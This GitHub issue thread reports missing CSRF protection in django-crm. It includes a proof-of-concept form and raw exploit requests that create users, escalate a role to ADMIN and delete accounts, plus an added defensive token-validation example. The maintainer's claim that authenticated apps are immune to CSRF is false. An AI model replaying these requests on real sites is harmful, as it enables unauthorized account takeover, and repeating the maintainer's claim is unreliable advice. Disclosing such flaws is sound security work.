
CSRF vulnerability almost all forms #68

Closed
abuvanth opened this issue Sep 4, 2018 · 6 comments

Comments

@abuvanth

abuvanth commented Sep 4, 2018

For example, the user creation form has no CSRF token validation, so an attacker can create their own account by sending a malicious link.

POC:

```html
<tr><td>last_name</td><td><input type="text" value="abuthahir++" name="last_name"></td></tr>
<tr><td>username</td><td><input type="text" value="abu" name="username"></td></tr>
<tr><td>email</td><td><input type="text" value="test@gmail.com" name="email"></td></tr>
<tr><td>role</td><td><input type="text" value="" name="role"></td></tr>
<tr><td>password</td><td><input type="text" value="reset!23" name="password"></td></tr>
</table><input type="submit" value="http://django-crm.micropyramid.com/users/create/"></form></html>
```

EXPLOIT REQUEST:

```http
POST /users/create/ HTTP/1.1
Host: django-crm.micropyramid.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://django-crm.micropyramid.com/users/create/
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Cookie: sessionid=g8up9d4xvqga5rwk1m7f4e4mhxmy111
Connection: close
Upgrade-Insecure-Requests: 1

first_name=syed&last_name=abuthahir++&username=abu&email=test%40gmail.com&role=&password=reset%2123
```

@abuvanth
Author

abuvanth commented Sep 4, 2018

User edit form has CSRF

Exploit request:

```http
POST /users/25/edit/ HTTP/1.1
Host: django-crm.micropyramid.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://django-crm.micropyramid.com/users/25/edit/
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
Cookie: csrftoken=zTfdp0GE2eqwRNnPNqfBX4seYXdFq8j8JtyzmYtaLWu3waAFjyfa7umOscWkO1iQ; sessionid=kta9sxfstfmi6mi2r4vankx5h1zuvvic
Connection: close
Upgrade-Insecure-Requests: 1

first_name=Adam&last_name=Chan&username=adamchan&email=test%40test.com&role=ADMIN
```

@abuvanth
Author

abuvanth commented Sep 4, 2018

CSRF while deleting an account

Exploit link https://django-crm.micropyramid.com/accounts/123/delete/

@abuvanth
Author

abuvanth commented Sep 4, 2018

There is no use if the CSRF token is present in the cookie.

@abuvanth
Author

abuvanth commented Sep 4, 2018

The CSRF token should be present in the form or in a custom header, and that CSRF token should be validated on the server side before the form is saved or something is deleted.
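A server-side check of the kind this comment describes, written here as an added example (not code from django-crm or from Django itself). It models a synchronizer-token pattern with a hypothetical in-memory session store and constructed request dicts; the field and header names follow Django's `csrfmiddlewaretoken` / `X-CSRFToken` conventions, and a token that arrives only in a cookie is rejected because browsers attach cookies to cross-site POSTs automatically.

```python
import hmac
import secrets

# Hypothetical server-side store: session id -> CSRF token bound to that session.
SESSION_TOKENS = {}


def issue_token(session_id):
    """Mint a token for the session, keep it server-side, return it for the view
    to embed in its form (or hand to a JS client for the custom header)."""
    token = secrets.token_urlsafe(32)
    SESSION_TOKENS[session_id] = token
    return token


def csrf_ok(request):
    """Validate a state-changing request. `request` is a constructed dict with
    "cookies", "form" and "headers". Only a token carried in the form body or
    in the X-CSRFToken header, matching the session's stored token, counts;
    a csrftoken cookie on its own proves nothing."""
    session_id = request.get("cookies", {}).get("sessionid")
    expected = SESSION_TOKENS.get(session_id)
    if expected is None:
        return False
    supplied = (request.get("form", {}).get("csrfmiddlewaretoken")
                or request.get("headers", {}).get("X-CSRFToken"))
    if not supplied:
        return False
    # constant-time comparison so token checks do not leak timing information
    return hmac.compare_digest(supplied, expected)


def demo():
    """Run the check over constructed requests; returns each verdict."""
    sid = "constructed-session-id"
    token = issue_token(sid)
    edit = {"first_name": "Adam", "role": "ADMIN"}
    return {
        # token present only as a cookie, the shape of the edit request reported above
        "cookie_only": csrf_ok({"cookies": {"sessionid": sid, "csrftoken": token},
                                "form": edit, "headers": {}}),
        "form_token": csrf_ok({"cookies": {"sessionid": sid},
                               "form": {**edit, "csrfmiddlewaretoken": token},
                               "headers": {}}),
        "header_token": csrf_ok({"cookies": {"sessionid": sid}, "form": edit,
                                 "headers": {"X-CSRFToken": token}}),
        "wrong_token": csrf_ok({"cookies": {"sessionid": sid},
                                "form": {**edit, "csrfmiddlewaretoken": "x" * 43},
                                "headers": {}}),
    }
```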


@ashwin31
Member

ashwin31 commented Sep 7, 2018

@abuvanth thanks for your observation, and there is no chance of CSRF for auth-protected applications. CSRF is for something like contact forms, which do not need to be authenticated to access.

Read "Am I Vulnerable To 'Cross-Site Request Forgery (CSRF)'?" section in the OWASP link provided by you.

There are very simple scripts we can execute in the terminal to get the CSRF token and send it back in no time.
Anyway, we will review and add or remove it completely to eliminate these confusions about security.

Thank you.

@ashwin31 ashwin31 closed this as completed Sep 7, 2018